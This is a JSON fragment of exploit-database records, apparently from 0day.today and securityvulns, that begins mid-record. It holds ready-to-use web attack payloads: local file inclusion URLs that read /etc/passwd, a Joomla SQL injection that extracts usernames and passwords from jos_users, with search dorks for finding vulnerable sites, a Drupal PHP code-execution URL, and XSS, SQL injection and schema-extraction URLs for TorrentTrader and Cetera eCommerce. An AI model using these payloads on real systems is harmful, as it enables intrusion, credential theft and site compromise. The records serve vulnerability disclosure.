\r\nhttp://site.com/index.php?cat=../../../../../../../etc/passwd%00\r\nhttp://site.com/index.php?archive=../../../../../../../etc/passwd%00\r\n--------\r\nyoung iranian h4ck3rz\r\n\r\n\r\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3504"}, {"lastseen": "2018-01-06T05:01:58", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-02-23T00:00:00", "published": "2008-02-23T00:00:00", "id": "1337DAY-ID-2687", "href": "https://0day.today/exploit/description/2687", "type": "zdt", "title": "Joomla Component simple shop 2.0 SQL Injection Vulnerability", "sourceData": "============================================================\r\nJoomla Component simple shop 2.0 SQL Injection Vulnerability\r\n============================================================\r\n\r\n\r\n\r\n###############################################################\r\n#\r\n# joomla com_simpleshop SQL Injection(section)\r\n#\r\n################################################################\r\n#\r\n# DORK 1 : allinurl:\"com_simpleshop\"\r\n#\r\n# DORK 2 : allinurl: \"com_simpleshop\"section\r\n#\r\n################################################################\r\nEXPLOIT :\r\n\r\nindex.php?option=com_simpleshop&[email\u00a0protected]&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*\r\n\r\n\r\r\n\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2687"}, {"lastseen": "2018-03-03T01:41:53", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-10-10T00:00:00", "published": "2007-10-10T00:00:00", "id": "1337DAY-ID-2213", "href": "https://0day.today/exploit/description/2213", "type": "zdt", "title": "Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector", "sourceData": "=============================================================\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n=============================================================\r\n\r\n\r\n\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n\r\nExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2213"}, {"lastseen": "2018-02-19T13:30:40", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "id": "1337DAY-ID-2204", "href": "https://0day.today/exploit/description/2204", "type": "zdt", "title": "TorrentTrader Classic 1.07 Multiple Remote Vulnerabilities", "sourceData": "==========================================================\r\nTorrentTrader Classic 1.07 Multiple Remote Vulnerabilities\r\n==========================================================\r\n\r\n\r\n\r\nTorrentTrader Classic Mutiple Remote vulnerabilities\r\nDiscovered By : HACKERS PAL\r\n\r\nTested on TorrentTrader Classic v1.07\r\nlocal file inclusion\r\nbackend/admin-functions.php?ss_uri=dd\r\nXss\r\npjirc/css.php?color=<script>alert(document.cookie);</script>\r\nbrowse.php?cat=<script>alert(document.cookie);</script>\r\n\r\n\r\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2204"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "description": "\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435 3APA3A!\r\n\r\n\u0421\u043e\u043e\u0431\u0449\u0430\u044e \u0432\u0430\u043c \u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u043c\u043d\u043e\u044e \u043d\u043e\u0432\u044b\u0445 Cross-Site Scripting, SQL Injection \u0438 SQL DB Structure Extraction \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 Cetera eCommerce.\r\n\r\nXSS &#40;WASC-08&#41; &#40;\u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 15.0&#41;:\r\n\r\nhttp://site/catalog/&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E/\r\n\r\nhttp://site/vendors/&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E/\r\n\r\nhttp://site/catalog/cart/&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E/\r\n\r\nhttp://site/news/&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E/\r\n\r\nhttp://site/news/13012011111030/&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E/\r\n\r\nXSS &#40;WASC-08&#41;:\r\n\r\nhttp://site/&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E/\r\n\r\n\u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 15.0. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u043c\u0435\u0435\u0442 \u043c\u0435\u0441\u0442\u043e \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u0441 404 \u043e\u0448\u0438\u0431\u043a\u043e\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u043d\u0430 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043a\u0430\u043a \u043f\u043e \u044d\u0442\u043e\u043c\u0443 \u0430\u0434\u0440\u0435\u0441\u0443,\r\n\u0442\u0430\u043a \u0438 \u043f\u043e \u0434\u0440\u0443\u0433\u0438\u043c \u0430\u0434\u0440\u0435\u0441\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0435\u0434\u0443\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b.\r\n\r\nSQL Injection &#40;WASC-19&#41;:\r\n\r\nhttp://site/catalog/&#40;version&#40;&#41;=5.1&#41;/\r\n\r\nhttp://site/catalog/cart/\u2019+benchmark&#40;100000,md5&#40;now&#40;&#41;&#41;&#41;+\u2019/\r\n\r\nSQL DB Structure Extraction &#40;WASC-13&#41;:\r\n\r\nhttp://site/catalog/&#37;22/\r\n\r\nhttp://site/catalog/cart/\u2019/\r\n\r\n\u0423\u044f\u0437\u0432\u0438\u043c\u044b Cetera eCommerce 14.0 \u0438 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438, \u0430 XSS \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0442\u0430\u043a\u0436\u0435 \u043a\u0430\u0441\u0430\u044e\u0442\u0441\u044f \u0432\u0435\u0440\u0441\u0438\u0438 15.0. \u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0436\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b\r\n\u0432 \u0432\u0435\u0440\u0441\u0438\u0438 Cetera eCommerce 15.0 &#40;\u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u044b\u0448\u043b\u0430 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 2010 \u0433\u043e\u0434\u0430&#41;.\r\n\r\n\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0434\u0430\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0443 \u043c\u0435\u043d\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435:\r\nhttp://websecurity.com.ua/4883/\r\n\r\nBest wishes &amp; regards,\r\nMustLive\r\n\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 \u0441\u0430\u0439\u0442\u0430\r\nhttp://websecurity.com.ua", "modified": "2011-03-29T00:00:00", "published": "2011-03-29T00:00:00", "id": "SECURITYVULNS:DOC:26008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26008", "title": "XSS, SQL Injection \u0438 SQL DB Structure Extraction \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Cetera eCommerce", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}